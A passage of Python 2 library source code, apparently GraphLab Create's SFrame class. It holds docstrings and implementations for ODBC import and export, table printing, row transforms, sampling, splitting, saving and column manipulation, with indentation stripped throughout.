>>> db = graphlab.connect_odbc("DSN=my_awesome_dsn;UID=user;PWD=mypassword")
>>> a_table = graphlab.SFrame.from_odbc(db, "SELECT * FROM a_table")
>>> join_result = graphlab.SFrame.from_odbc(db, 'SELECT * FROM "MyTable" a, "AnotherTable" b WHERE a.id=b.id')
"""
result = db.execute_query(sql)
if not isinstance(result, SFrame):
raise RuntimeError("Cannot create an SFrame for query. No result set.")
cls = result
return cls
def to_odbc(self, db, table_name, append_if_exists=False, verbose=True):
"""
Convert an SFrame to a table in a database.
By default, searches for a table in the database with the given name.
If found, this will attempt to append all the rows of the SFrame to the
end of the table. If not, this will create a new table with the given
name. This behavior is toggled with the `append_if_exists` flag.
When creating a new table, GraphLab Create uses a heuristic approach to
pick a corresponding type for each column in the SFrame using the type
information supplied by the database's ODBC driver. Your driver must
support giving this type information for GraphLab Create to support
writing to the database.
To allow more expressive and accurate naming, `to_odbc` puts quotes
around each identifier (table names and column names). Depending on
your database, you may need to refer to the created table with quote
characters around the name. This character is not the same for all
databases, but '"' is the most common.
Parameters
----------
db : `graphlab.extensions._odbc_connection.unity_odbc_connection`
An ODBC connection object. This can only be obtained by calling
`graphlab.connect_odbc`. Check that documentation for how to create
this object.
table_name : str
The name of the table you would like to create/append to.
append_if_exists : bool
If True, this will attempt to append to the table named `table_name`
if it is found to exist in the database.
verbose : bool
Print progress updates on the insertion process.
Notes
-----
This functionality is only supported when using GraphLab Create
entirely on your local machine. Therefore, GraphLab Create's EC2 and
Hadoop execution modes will not be able to use ODBC. Note that this
"local machine" rule does not apply to the machine your database is
running on, which can (and often will) be running on a separate
machine.
Examples
--------
>>> db = graphlab.connect_odbc("DSN=my_awesome_dsn;UID=user;PWD=mypassword")
>>> sf = graphlab.SFrame({'a':[1,2,3],'b':['hi','pika','bye']})
>>> sf.to_odbc(db, 'a_cool_table')
"""
if (not verbose):
glconnect.get_client().set_log_progress(False)
db._insert_sframe(self, table_name, append_if_exists)
if (not verbose):
glconnect.get_client().set_log_progress(True)
def __repr__(self):
"""
Returns a string description of the frame
"""
printed_sf = self._imagecols_to_stringcols()
ret = self.__get_column_description__()
if self.__has_size__():
ret = ret + "Rows: " + str(len(self)) + "\n\n"
else:
ret = ret + "Rows: Unknown" + "\n\n"
ret = ret + "Data:\n"
if (len(printed_sf.head()) > 0):
ret = ret + str(self)
else:
ret = ret + "\t[]"
return ret
def __get_column_description__(self):
colnames = self.column_names()
coltypes = self.column_types()
ret = "Columns:\n"
if len(colnames) > 0:
for i in range(len(colnames)):
ret = ret + "\t" + colnames[i] + "\t" + coltypes[i].__name__ + "\n"
ret = ret + "\n"
else:
ret = ret + "\tNone\n\n"
return ret
def __get_pretty_tables__(self, wrap_text=False, max_row_width=80,
max_column_width=30, max_columns=20,
max_rows_to_display=60):
"""
Returns a list of pretty print tables representing the current SFrame.
If the number of columns is larger than max_columns, the last pretty
table will contain an extra column of "...".
Parameters
----------
wrap_text : bool, optional
max_row_width : int, optional
Max number of characters per table.
max_column_width : int, optional
Max number of characters per column.
max_columns : int, optional
Max number of columns per table.
max_rows_to_display : int, optional
Max number of rows to display.
Returns
-------
out : list[PrettyTable]
"""
headsf = self.head(max_rows_to_display)
if headsf.shape == (0, 0):
return [PrettyTable()]
# convert array.array column to list column so they print like [...]
# and not array('d', ...)
for col in headsf.column_names():
if headsf[col].dtype() is array.array:
headsf[col] = headsf[col].astype(list)
def _value_to_str(value):
if (type(value) is array.array):
return str(list(value))
elif (type(value) is list):
return '[' + ", ".join(_value_to_str(x) for x in value) + ']'
else:
return str(value)
def _escape_space(s):
return "".join([ch.encode('string_escape') if ch.isspace() else ch for ch in s])
def _truncate_respect_unicode(s, max_length):
if (len(s) <= max_length):
return s
else:
u = unicode(s, 'utf-8', errors='replace')
return u[:max_length].encode('utf-8')
def _truncate_str(s, wrap_str=False):
"""
Truncate and optionally wrap the input string as unicode, replace
unconvertible character with a diamond ?.
"""
s = _escape_space(s)
if len(s) <= max_column_width:
return unicode(s, 'utf-8', errors='replace')
else:
ret = ''
# if wrap_str is true, wrap the text and take at most 2 rows
if wrap_str:
wrapped_lines = wrap(s, max_column_width)
if len(wrapped_lines) == 1:
return wrapped_lines[0]
last_line = wrapped_lines[1]
if len(last_line) >= max_column_width:
last_line = _truncate_respect_unicode(last_line, max_column_width - 4)
ret = wrapped_lines[0] + '\n' + last_line + ' ...'
else:
ret = _truncate_respect_unicode(s, max_column_width - 4) + '...'
return unicode(ret, 'utf-8', errors='replace')
columns = self.column_names()[:max_columns]
columns.reverse() # reverse the order of columns and we will pop from the end
num_column_of_last_table = 0
row_of_tables = []
# let's build a list of tables with max_columns
# each table should satisfy, max_row_width, and max_column_width
while len(columns) > 0:
tbl = PrettyTable()
table_width = 0
num_column_of_last_table = 0
while len(columns) > 0:
col = columns.pop()
# check the max length of element in the column
if len(headsf) > 0:
col_width = min(max_column_width, max(len(str(x)) for x in headsf[col]))
else:
col_width = max_column_width
if (table_width + col_width < max_row_width):
# truncate the header if necessary
header = _truncate_str(col, wrap_text)
tbl.add_column(header, [_truncate_str(_value_to_str(x), wrap_text) for x in headsf[col]])
table_width = str(tbl).find('\n')
num_column_of_last_table += 1
else:
# the column does not fit in the current table, push it back to columns
columns.append(col)
break
tbl.align = 'c'
row_of_tables.append(tbl)
# add a column of all "..." if there are more columns than displayed
if self.num_cols() > max_columns:
row_of_tables[-1].add_column('...', ['...'] * len(headsf))
num_column_of_last_table += 1
# add a row of all "..." if there are more rows than displayed
if self.__has_size__() and self.num_rows() > headsf.num_rows():
row_of_tables[-1].add_row(['...'] * num_column_of_last_table)
return row_of_tables
def print_rows(self, num_rows=10, num_columns=40, max_column_width=30,
max_row_width=80):
"""
Print the first M rows and N columns of the SFrame in human readable
format.
Parameters
----------
num_rows : int, optional
Number of rows to print.
num_columns : int, optional
Number of columns to print.
max_column_width : int, optional
Maximum width of a column. Columns use fewer characters if possible.
max_row_width : int, optional
Maximum width of a printed row. Columns beyond this width wrap to a
new line. `max_row_width` is automatically reset to be the
larger of itself and `max_column_width`.
See Also
--------
head, tail
"""
max_row_width = max(max_row_width, max_column_width + 1)
printed_sf = self._imagecols_to_stringcols(num_rows)
row_of_tables = printed_sf.__get_pretty_tables__(wrap_text=False,
max_rows_to_display=num_rows,
max_columns=num_columns,
max_column_width=max_column_width,
max_row_width=max_row_width)
footer = "[%d rows x %d columns]\n" % self.shape
print '\n'.join([str(tb) for tb in row_of_tables]) + "\n" + footer
def _imagecols_to_stringcols(self, num_rows=10):
# A list of column types
types = self.column_types()
# A list of indexable column names
names = self.column_names()
# Constructing names of sframe columns that are of image type
image_column_names = [names[i] for i in range(len(names)) if types[i] == graphlab.Image]
#If there are image-type columns, copy the SFrame and cast the top MAX_NUM_ROWS_TO_DISPLAY of those columns to string
if len(image_column_names) > 0:
printed_sf = SFrame()
for t in names:
if t in image_column_names:
printed_sf[t] = self[t]._head_str(num_rows)
else:
printed_sf[t] = self[t].head(num_rows)
else:
printed_sf = self
return printed_sf
def __str__(self, num_rows=10, footer=True):
"""
Returns a string containing the first 10 elements of the frame, along
with a description of the frame.
"""
MAX_ROWS_TO_DISPLAY = num_rows
printed_sf = self._imagecols_to_stringcols(MAX_ROWS_TO_DISPLAY)
row_of_tables = printed_sf.__get_pretty_tables__(wrap_text=False, max_rows_to_display=MAX_ROWS_TO_DISPLAY)
if (not footer):
return '\n'.join([str(tb) for tb in row_of_tables])
if self.__has_size__():
footer = '[%d rows x %d columns]\n' % self.shape
if (self.num_rows() > MAX_ROWS_TO_DISPLAY):
footer += '\n'.join(FOOTER_STRS)
else:
footer = '[? rows x %d columns]\n' % self.num_columns()
footer += '\n'.join(LAZY_FOOTER_STRS)
return '\n'.join([str(tb) for tb in row_of_tables]) + "\n" + footer
def _repr_html_(self):
MAX_ROWS_TO_DISPLAY = 10
printed_sf = self._imagecols_to_stringcols(MAX_ROWS_TO_DISPLAY)
row_of_tables = printed_sf.__get_pretty_tables__(wrap_text=True, max_row_width=120, max_columns=40, max_column_width=25, max_rows_to_display=MAX_ROWS_TO_DISPLAY)
if self.__has_size__():
footer = '[%d rows x %d columns]<br/>' % self.shape
if (self.num_rows() > MAX_ROWS_TO_DISPLAY):
footer += '<br/>'.join(FOOTER_STRS)
else:
footer = '[? rows x %d columns]<br/>' % self.num_columns()
footer += '<br/>'.join(LAZY_FOOTER_STRS)
begin = '<div style="max-height:1000px;max-width:1500px;overflow:auto;">'
end = '\n</div>'
return begin + '\n'.join([tb.get_html_string(format=True) for tb in row_of_tables]) + "\n" + footer + end
def __nonzero__(self):
"""
Returns true if the frame is not empty.
"""
return self.num_rows() != 0
def __len__(self):
"""
Returns the number of rows of the sframe.
"""
return self.num_rows()
def __copy__(self):
"""
Returns a shallow copy of the sframe.
"""
return self.select_columns(self.column_names())
def __eq__(self, other):
raise NotImplementedError
def __ne__(self, other):
raise NotImplementedError
def _row_selector(self, other):
"""
Where other is an SArray of identical length as the current Frame,
this returns a selection of a subset of rows in the current SFrame
where the corresponding row in the selector is non-zero.
"""
if type(other) is SArray:
if len(other) != len(self):
raise IndexError("Cannot perform logical indexing on arrays of different length.")
with cython_context():
return SFrame(_proxy=self.__proxy__.logical_filter(other.__proxy__))
def dtype(self):
"""
The type of each column.
Returns
-------
out : list[type]
Column types of the SFrame.
See Also
--------
column_types
"""
return self.column_types()
def num_rows(self):
"""
The number of rows in this SFrame.
Returns
-------
out : int
Number of rows in the SFrame.
See Also
--------
num_columns
"""
return self.__proxy__.num_rows()
def num_cols(self):
"""
The number of columns in this SFrame.
Returns
-------
out : int
Number of columns in the SFrame.
See Also
--------
num_columns, num_rows
"""
return self.__proxy__.num_columns()
def num_columns(self):
"""
The number of columns in this SFrame.
Returns
-------
out : int
Number of columns in the SFrame.
See Also
--------
num_cols, num_rows
"""
return self.__proxy__.num_columns()
def column_names(self):
"""
The name of each column in the SFrame.
Returns
-------
out : list[string]
Column names of the SFrame.
See Also
--------
rename
"""
return self.__proxy__.column_names()
def column_types(self):
"""
The type of each column in the SFrame.
Returns
-------
out : list[type]
Column types of the SFrame.
See Also
--------
dtype
"""
return self.__proxy__.dtype()
def head(self, n=10):
"""
The first n rows of the SFrame.
Parameters
----------
n : int, optional
The number of rows to fetch.
Returns
-------
out : SFrame
A new SFrame which contains the first n rows of the current SFrame
See Also
--------
tail, print_rows
"""
return SFrame(_proxy=self.__proxy__.head(n))
def to_dataframe(self):
"""
Convert this SFrame to pandas.DataFrame.
This operation will construct a pandas.DataFrame in memory. Care must
be taken when size of the returned object is big.
Returns
-------
out : pandas.DataFrame
The dataframe which contains all rows of SFrame
"""
assert HAS_PANDAS
df = pandas.DataFrame()
for i in range(self.num_columns()):
column_name = self.column_names()[i]
df[column_name] = list(self[column_name])
if len(df[column_name]) == 0:
df[column_name] = df[column_name].astype(self.column_types()[i])
return df
def tail(self, n=10):
"""
The last n rows of the SFrame.
Parameters
----------
n : int, optional
The number of rows to fetch.
Returns
-------
out : SFrame
A new SFrame which contains the last n rows of the current SFrame
See Also
--------
head, print_rows
"""
return SFrame(_proxy=self.__proxy__.tail(n))
def apply(self, fn, dtype=None, seed=None):
"""
Transform each row to an :class:`~graphlab.SArray` according to a
specified function. Returns a new SArray of ``dtype`` where each element
in this SArray is transformed by `fn(x)` where `x` is a single row in
the sframe represented as a dictionary. The ``fn`` should return
exactly one value which can be cast into type ``dtype``. If ``dtype`` is
not specified, the first 100 rows of the SFrame are used to make a guess
of the target data type.
Parameters
----------
fn : function
The function to transform each row of the SFrame. The return
type should be convertible to `dtype` if `dtype` is not None.
This can also be a toolkit extension function which is compiled
as a native shared library using SDK.
dtype : dtype, optional
The dtype of the new SArray. If None, the first 100
elements of the array are used to guess the target
data type.
seed : int, optional
Used as the seed if a random number generator is included in `fn`.
Returns
-------
out : SArray
The SArray transformed by fn. Each element of the SArray is of
type ``dtype``
Examples
--------
Concatenate strings from several columns:
>>> sf = graphlab.SFrame({'user_id': [1, 2, 3], 'movie_id': [3, 3, 6],
'rating': [4, 5, 1]})
>>> sf.apply(lambda x: str(x['user_id']) + str(x['movie_id']) + str(x['rating']))
dtype: str
Rows: 3
['134', '235', '361']
Using native toolkit extension function:
.. code-block:: c++
#include <graphlab/sdk/toolkit_function_macros.hpp>
double mean(const std::map<flexible_type, flexible_type>& dict) {
double sum = 0.0;
for (const auto& kv: dict) sum += (double)kv.second;
return sum / dict.size();
}
BEGIN_FUNCTION_REGISTRATION
REGISTER_FUNCTION(mean, "row");
END_FUNCTION_REGISTRATION
compiled into example.so
>>> import example
>>> sf = graphlab.SFrame({'x0': [1, 2, 3], 'x1': [2, 3, 1],
... 'x2': [3, 1, 2]})
>>> sf.apply(example.mean)
dtype: float
Rows: 3
[2.0,2.0,2.0]
"""
assert _is_callable(fn), "Input must be a function"
test_sf = self[:10]
dryrun = [fn(row) for row in test_sf]
if dtype is None:
dtype = SArray(dryrun).dtype()
if not seed:
seed = int(time.time())
_mt._get_metric_tracker().track('sframe.apply')
nativefn = None
try:
import graphlab.extensions as extensions
nativefn = extensions._build_native_function_call(fn)
except:
pass
if nativefn is not None:
# this is a toolkit lambda. We can do something about it
with cython_context():
return SArray(_proxy=self.__proxy__.transform_native(nativefn, dtype, seed))
with cython_context():
return SArray(_proxy=self.__proxy__.transform(fn, dtype, seed))
def flat_map(self, column_names, fn, column_types='auto', seed=None):
"""
Map each row of the SFrame to multiple rows in a new SFrame via a
function.
The output of `fn` must have type List[List[...]]. Each inner list
will be a single row in the new output, and the collection of these
rows within the outer list make up the data for the output SFrame.
All rows must have the same length and the same order of types to
make sure the result columns are homogeneously typed. For example, if
the first element emitted into in the outer list by `fn` is
[43, 2.3, 'string'], then all other elements emitted into the outer
list must be a list with three elements, where the first is an int,
second is a float, and third is a string. If column_types is not
specified, the first 10 rows of the SFrame are used to determine the
column types of the returned sframe.
Parameters
----------
column_names : list[str]
The column names for the returned SFrame.
fn : function
The function that maps each of the sframe row into multiple rows,
returning List[List[...]]. All outputted rows must have the same
length and order of types.
column_types : list[type], optional
The column types of the output SFrame. Default value will be
automatically inferred by running `fn` on the first 10 rows of the
input. If the types cannot be inferred from the first 10 rows, an
error is raised.
seed : int, optional
Used as the seed if a random number generator is included in `fn`.
Returns
-------
out : SFrame
A new SFrame containing the results of the flat_map of the
original SFrame.
Examples
---------
Repeat each row according to the value in the 'number' column.
>>> sf = graphlab.SFrame({'letter': ['a', 'b', 'c'],
... 'number': [1, 2, 3]})
>>> sf.flat_map(['number', 'letter'],
... lambda x: [list(x.itervalues()) for i in range(0, x['number'])])
+--------+--------+
| number | letter |
+--------+--------+
| 1 | a |
| 2 | b |
| 2 | b |
| 3 | c |
| 3 | c |
| 3 | c |
+--------+--------+
[6 rows x 2 columns]
"""
assert inspect.isfunction(fn), "Input must be a function"
if not seed:
seed = int(time.time())
_mt._get_metric_tracker().track('sframe.flat_map')
# determine the column_types
if column_types == 'auto':
types = set()
sample = self[0:10]
results = [fn(row) for row in sample]
for rows in results:
if type(rows) is not list:
raise TypeError("Output type of the lambda function must be a list of lists")
# note: this skips empty lists
for row in rows:
if type(row) is not list:
raise TypeError("Output type of the lambda function must be a list of lists")
types.add(tuple([type(v) for v in row]))
if len(types) == 0:
raise TypeError, \
"Could not infer output column types from the first ten rows " +\
"of the SFrame. Please use the 'column_types' parameter to " +\
"set the types."
if len(types) > 1:
raise TypeError("Mapped rows must have the same length and types")
column_types = list(types.pop())
assert type(column_types) is list
assert len(column_types) == len(column_names), "Number of output columns must match the size of column names"
with cython_context():
return SFrame(_proxy=self.__proxy__.flat_map(fn, column_names, column_types, seed))
def sample(self, fraction, seed=None):
"""
Sample the current SFrame's rows.
Parameters
----------
fraction : float
Approximate fraction of the rows to fetch. Must be between 0 and 1.
The number of rows returned is approximately the fraction times the
number of rows.
seed : int, optional
Seed for the random number generator used to sample.
Returns
-------
out : SFrame
A new SFrame containing sampled rows of the current SFrame.
Examples
--------
Suppose we have an SFrame with 6,145 rows.
>>> import random
>>> sf = SFrame({'id': range(0, 6145)})
Retrieve about 30% of the SFrame rows with repeatable results by
setting the random seed.
>>> len(sf.sample(.3, seed=5))
1783
"""
if not seed:
seed = int(time.time())
if (fraction > 1 or fraction < 0):
raise ValueError('Invalid sampling rate: ' + str(fraction))
_mt._get_metric_tracker().track('sframe.sample')
if (self.num_rows() == 0 or self.num_cols() == 0):
return self
else:
with cython_context():
return SFrame(_proxy=self.__proxy__.sample(fraction, seed))
def random_split(self, fraction, seed=None):
"""
Randomly split the rows of an SFrame into two SFrames. The first SFrame
contains *M* rows, sampled uniformly (without replacement) from the
original SFrame. *M* is approximately the fraction times the original
number of rows. The second SFrame contains the remaining rows of the
original SFrame.
Parameters
----------
fraction : float
Approximate fraction of the rows to fetch for the first returned
SFrame. Must be between 0 and 1.
seed : int, optional
Seed for the random number generator used to split.
Returns
-------
out : tuple [SFrame]
Two new SFrames.
Examples
--------
Suppose we have an SFrame with 1,024 rows and we want to randomly split
it into training and testing datasets with about a 90%/10% split.
>>> sf = graphlab.SFrame({'id': range(1024)})
>>> sf_train, sf_test = sf.random_split(.9, seed=5)
>>> print len(sf_train), len(sf_test)
922 102
"""
if (fraction > 1 or fraction < 0):
raise ValueError('Invalid sampling rate: ' + str(fraction))
if (self.num_rows() == 0 or self.num_cols() == 0):
return (SFrame(), SFrame())
if not seed:
seed = int(time.time())
# The server side requires this to be an int, so cast if we can
try:
seed = int(seed)
except ValueError:
raise ValueError('The \'seed\' parameter must be of type int.')
_mt._get_metric_tracker().track('sframe.random_split')
with cython_context():
proxy_pair = self.__proxy__.random_split(fraction, seed)
return (SFrame(data=[], _proxy=proxy_pair[0]), SFrame(data=[], _proxy=proxy_pair[1]))
def topk(self, column_name, k=10, reverse=False):
"""
Get top k rows according to the given column. Result is according to and
sorted by `column_name` in the given order (default is descending).
When `k` is small, `topk` is more efficient than `sort`.
Parameters
----------
column_name : string
The column to sort on
k : int, optional
The number of rows to return
reverse : bool, optional
If True, return the top k rows in ascending order, otherwise, in
descending order.
Returns
-------
out : SFrame
an SFrame containing the top k rows sorted by column_name.
See Also
--------
sort
Examples
--------
>>> sf = graphlab.SFrame({'id': range(1000)})
>>> sf['value'] = -sf['id']
>>> sf.topk('id', k=3)
+--------+--------+
| id | value |
+--------+--------+
| 999 | -999 |
| 998 | -998 |
| 997 | -997 |
+--------+--------+
[3 rows x 2 columns]
>>> sf.topk('value', k=3)
+--------+--------+
| id | value |
+--------+--------+
| 1 | -1 |
| 2 | -2 |
| 3 | -3 |
+--------+--------+
[3 rows x 2 columns]
"""
if type(column_name) is not str:
raise TypeError("column_name must be a string")
_mt._get_metric_tracker().track('sframe.topk')
sf = self[self[column_name].topk_index(k, reverse)]
return sf.sort(column_name, ascending=reverse)
def save(self, filename, format=None):
"""
Save the SFrame to a file system for later use.
Parameters
----------
filename : string
The location to save the SFrame. Either a local directory or a
remote URL. If the format is 'binary', a directory will be created
at the location which will contain the sframe.
format : {'binary', 'csv'}, optional
Format in which to save the SFrame. Binary saved SFrames can be
loaded much faster and without any format conversion losses. If not
given, will try to infer the format from filename given. If file
name ends with 'csv' or '.csv.gz', then save as 'csv' format,
otherwise save as 'binary' format.
See Also
--------
load_sframe, SFrame
Examples
--------
>>> # Save the sframe into binary format
>>> sf.save('data/training_data_sframe')
>>> # Save the sframe into csv format
>>> sf.save('data/training_data.csv', format='csv')
"""
_mt._get_metric_tracker().track('sframe.save', properties={'format':format})
if format == None:
if filename.endswith(('.csv', '.csv.gz')):
format = 'csv'
else:
format = 'binary'
else:
if format is 'csv':
if not filename.endswith(('.csv', '.csv.gz')):
filename = filename + '.csv'
elif format is not 'binary':
raise ValueError("Invalid format: {}. Supported formats are 'csv' and 'binary'".format(format))
## Save the SFrame
url = _make_internal_url(filename)
with cython_context():
if format is 'binary':
self.__proxy__.save(url)
elif format is 'csv':
assert filename.endswith(('.csv', '.csv.gz'))
self.__proxy__.save_as_csv(url, {})
else:
raise ValueError("Unsupported format: {}".format(format))
def select_column(self, key):
"""
Get a reference to the :class:`~graphlab.SArray` that corresponds with
the given key. Throws an exception if the key is something other than a
string or if the key is not found.
Parameters
----------
key : str
The column name.
Returns
-------
out : SArray
The SArray that is referred by ``key``.
See Also
--------
select_columns
Examples
--------
>>> sf = graphlab.SFrame({'user_id': [1,2,3],
... 'user_name': ['alice', 'bob', 'charlie']})
>>> # This line is equivalent to `sa = sf['user_name']`
>>> sa = sf.select_column('user_name')
>>> sa
dtype: str
Rows: 3
['alice', 'bob', 'charlie']
"""
if not isinstance(key, str):
raise TypeError("Invalid key type: must be str")
with cython_context():
return SArray(data=[], _proxy=self.__proxy__.select_column(key))
def select_columns(self, keylist):
"""
Get SFrame composed only of the columns referred to in the given list of
keys. Throws an exception if ANY of the keys are not in this SFrame or
if ``keylist`` is anything other than a list of strings.
Parameters
----------
keylist : list[str]
The list of column names.
Returns
-------
out : SFrame
A new SFrame that is made up of the columns referred to in
``keylist`` from the current SFrame.
See Also
--------
select_column
Examples
--------
>>> sf = graphlab.SFrame({'user_id': [1,2,3],
... 'user_name': ['alice', 'bob', 'charlie'],
... 'zipcode': [98101, 98102, 98103]
... })
>>> # This line is equivalent to `sf2 = sf[['user_id', 'zipcode']]`
>>> sf2 = sf.select_columns(['user_id', 'zipcode'])
>>> sf2
+---------+---------+
| user_id | zipcode |
+---------+---------+
| 1 | 98101 |
| 2 | 98102 |
| 3 | 98103 |
+---------+---------+
[3 rows x 2 columns]
"""
if not hasattr(keylist, '__iter__'):
raise TypeError("keylist must be an iterable")
if not all([isinstance(x, str) for x in keylist]):
raise TypeError("Invalid key type: must be str")
key_set = set(keylist)
if (len(key_set)) != len(keylist):
for key in key_set:
if keylist.count(key) > 1:
raise ValueError("There are duplicate keys in key list: '" + key + "'")
with cython_context():
return SFrame(data=[], _proxy=self.__proxy__.select_columns(keylist))
def add_column(self, data, name=""):
"""
Add a column to this SFrame. The number of elements in the data given
must match the length of every other column of the SFrame. This
operation modifies the current SFrame in place and returns self. If no
name is given, a default name is chosen.
Parameters
----------
data : SArray
The 'column' of data to add.
name : string, optional
The name of the column. If no name is given, a default name is
chosen.
Returns
-------
out : SFrame
The current SFrame.
See Also
--------
add_columns
Examples
--------
>>> sf = graphlab.SFrame({'id': [1, 2, 3], 'val': ['A', 'B', 'C']})
>>> sa = graphlab.SArray(['cat', 'dog', 'fossa'])
>>> # This line is equivalant to `sf['species'] = sa`
>>> sf.add_column(sa, name='species')
>>> sf
+----+-----+---------+
| id | val | species |
+----+-----+---------+
| 1 | A | cat |
| 2 | B | dog |
| 3 | C | fossa |
+----+-----+---------+
[3 rows x 3 columns]
"""
# Check type for pandas dataframe or SArray?
if not isinstance(data, SArray):
raise TypeError("Must give column as SArray")
if not isinstance(name, str):
raise TypeError("Invalid column name: must be str")
with cython_context():
self.__proxy__.add_column(data.__proxy__, name)
return self
def add_columns(self, data, namelist=None):
"""
Adds multiple columns to this SFrame. The number of elements in all
columns must match the length of every other column of the SFrame. This
operation modifies the current SFrame in place and returns self.
Parameters
----------
data : list[SArray] or SFrame
The columns to add.
namelist : list of string, optional
A list of column names. All names must be specified. ``namelist`` is
ignored if data is an SFrame.
Returns
-------
out : SFrame
The current SFrame.
See Also
--------
add_column
Examples
--------
>>> sf = graphlab.SFrame({'id': [1, 2, 3], 'val': ['A', 'B', 'C']})
>>> sf2 = graphlab.SFrame({'species': ['cat', 'dog', 'fossa'],
... 'age': [3, 5, 9]})
>>> sf.add_columns(sf2)
>>> sf
+----+-----+-----+---------+
| id | val | age | species |
+----+-----+-----+---------+
| 1 | A | 3 | cat |
| 2 | B | 5 | dog |
| 3 | C | 9 | fossa |
+----+-----+-----+---------+
[3 rows x 4 columns]
"""
datalist = data
if isinstance(data, SFrame):
other = data
datalist = [other.select_column(name) for name in other.column_names()]
namelist = other.column_names()
my_columns = set(self.column_names())
for name in namelist:
if name in my_columns:
raise ValueError("Column '" + name + "' already exists in current SFrame")
else:
if not hasattr(datalist, '__iter__'):
raise TypeError("datalist must be an iterable")
if not hasattr(namelist, '__iter__'):
raise TypeError("namelist must be an iterable")
if not all([isinstance(x, SArray) for x in datalist]):
raise TypeError("Must give column as SArray")
if not all([isinstance(x, str) for x in namelist]):
raise TypeError("Invalid column name in list : must all be str")
with cython_context():
self.__proxy__.add_columns([x.__proxy__ for x in datalist], namelist)
return self
def remove_column(self, name):
"""
Remove a column from this SFrame. This operation modifies the current
SFrame in place and returns self.
Parameters
----------
name : string
The name of the column to remove.
Returns
-------
out : SFrame
The SFrame with given column removed.
Examples
--------
>>> sf = graphlab.SFrame({'id': [1, 2, 3], 'val': ['A', 'B', 'C']})
>>> # This is equivalent to `del sf['val']`
>>> sf.remove_column('val')
>>> sf
+----+
| id |
+----+
| 1 |
| 2 |
| 3 |
+----+
[3 rows x 1 columns]
"""
if name not in self.column_names():
raise KeyError('Cannot find column %s' % name)
colid = self.column_names().index(name)
with cython_context():
self.__proxy__.remove_column(colid)
return self
def remove_columns(self, column_names):
"""
Remove one or more columns from this SFrame. This operation modifies the current
SFrame in place and returns self.
Parameters
----------
column_names : list or iterable
A list or iterable of column names.
Returns
-------
out : SFrame
The SFrame with given columns removed.
Examples
--------
>>> sf = graphlab.SFrame({'id': [1, 2, 3], 'val1': ['A', 'B', 'C'], 'val2' : [10, 11, 12]})
>>> sf.remove_columns(['val1', 'val2'])
>>> sf
+----+
| id |
+----+
| 1 |
| 2 |
| 3 |
+----+
[3 rows x 1 columns]
"""
column_names = list(column_names)
existing_columns = dict((k, i) for i, k in enumerate(self.column_names()))
for name in column_names:
if name not in existing_columns:
raise KeyError('Cannot find column %s' % name)
# Delete it going backwards so we don't invalidate indices
deletion_indices = sorted(existing_columns[name] for name in column_names)
for colid in reversed(deletion_indices):
with cython_context():
self.__proxy__.remove_column(colid)
return self
def swap_columns(self, column_1, column_2):
"""
Swap the columns with the given names. This operation modifies the
current SFrame in place and returns self.
Parameters
----------
column_1 : string
Name of column to swap
column_2 : string
Name of other column to swap
Returns
-------
out : SFrame
The SFrame with swapped columns.
Examples
--------
>>> sf = graphlab.SFrame({'id': [1, 2, 3], 'val': ['A', 'B', 'C']})
>>> sf.swap_columns('id', 'val')
>>> sf
+-----+-----+
| val | id |
+-----+-----+
| A | 1 |
| B | 2 |
| C | 3 |
+----+-----+
[3 rows x 2 columns]
"""
colnames = self.column_names()
colid_1 = colnames.index(column_1)
colid_2 = colnames.index(column_2)
with cython_context():
self.__proxy__.swap_columns(colid_1, colid_2)
return self
def rename(self, names):
"""
Rename the given columns. ``names`` is expected to be a dict specifying
the old and new names. This changes the names of the columns given as
the keys and replaces them with the names given as the values. This
operation modifies the current SFrame in place and returns self.
Parameters
----------
names : dict [string, string]
Dictionary of [old_name, new_name]
Returns
-------
out : SFrame
The current SFrame.
See Also
--------
column_names
Examples
--------
>>> sf = SFrame({'X1': ['Alice','Bob'],
... 'X2': ['123 Fake Street','456 Fake Street']})
>>> sf.rename({'X1': 'name', 'X2':'address'})
>>> sf
+-------+-----------------+
| name | address |
+-------+-----------------+
| Alice | 123 Fake Street |
| Bob | 456 Fake Street |
+-------+-----------------+
[2 rows x 2 columns]
"""
if (type(names) is not dict):
raise TypeError('names must be a dictionary: oldname -> newname')
all_columns = set(self.column_names())
for k in names:
if not k in all_columns:
raise ValueError('Cannot find column %s in the SFrame' % k)
with cython_context():
for k in names:
colid = self.column_names().index(k)
self.__proxy__.set_column_name(colid, names[k])
return self
def __getitem__(self, key):
"""
This method does things based on the type of `key`.
If `key` is:
* str
Calls `select_column` on `key`
* SArray
Performs a logical filter. Expects given SArray to be the same
length as all columns in current SFrame. Every row
corresponding with an entry in the given SArray that is
equivalent to False is filtered from the result.
* int
Returns a single row of the SFrame (the `key`th one) as a dictionary.
* slice
Returns an SFrame including only the sliced rows.
"""
if type(key) is SArray:
return self._row_selector(key)
elif type(key) is list:
return self.select_columns(key)
elif type(key) is str:
return self.select_column(key)
elif type(key) is int:
if key < 0:
key = len(self) + key
if key >= len(self):
raise IndexError("SFrame index out of range")
return list(SFrame(_proxy = self.__proxy__.copy_range(key, 1, key+1)))[0]
elif type(key) is slice:
start = key.start
stop = key.stop
step = key.step
if start is None:
start = 0
if stop is None:
stop = len(self)
if step is None:
step = 1
# handle negative indices
if start < 0:
start = len(self) + start
if stop < 0:
stop = len(self) + stop
return SFrame(_proxy = self.__proxy__.copy_range(start, step, stop))
else:
raise TypeError("Invalid index type: must be SArray, list, or str")
def __setitem__(self, key, value):
"""
A wrapper around add_column(s). Key can be either a list or a str. If
value is an SArray, it is added to the SFrame as a column. If it is a
constant value (int, str, or float), then a column is created where
every entry is equal to the constant value. Existing columns can also
be replaced using this wrapper.
"""
if type(key) is list:
self.add_columns(value, key)
elif type(key) is str:
sa_value = None
if (type(value) is SArray):
sa_value = value
elif hasattr(value, '__iter__'): # wrap list, array... to sarray
sa_value = SArray(value)
else: # create an sarray of constant value
sa_value = SArray.from_const(value, self.num_rows())
# set new column
if not key in self.column_names():
with cython_context():
self.add_column(sa_value, key)
else:
# special case if replacing the only column.
# server would fail the replacement if the new column has different
# length than current one, which doesn't make sense if we are replacing
# the only column. To support this, we first take out the only column
# and then put it back if exception happens
single_column = (self.num_cols() == 1)
if (single_column):
tmpname = key
saved_column = self.select_column(key)
self.remove_column(key)
else:
# add the column to a unique column name.
tmpname = '__' + '-'.join(self.column_names())
try:
self.add_column(sa_value, tmpname)
except Exception as e:
if (single_column):
self.add_column(saved_column, key)
raise
if (not single_column):
# if add succeeded, remove the column name and rename tmpname->columnname.
self.swap_columns(key, tmpname)
self.remove_column(key)
self.rename({tmpname: key})
else:
raise TypeError('Cannot set column with key type ' + str(type(key)))
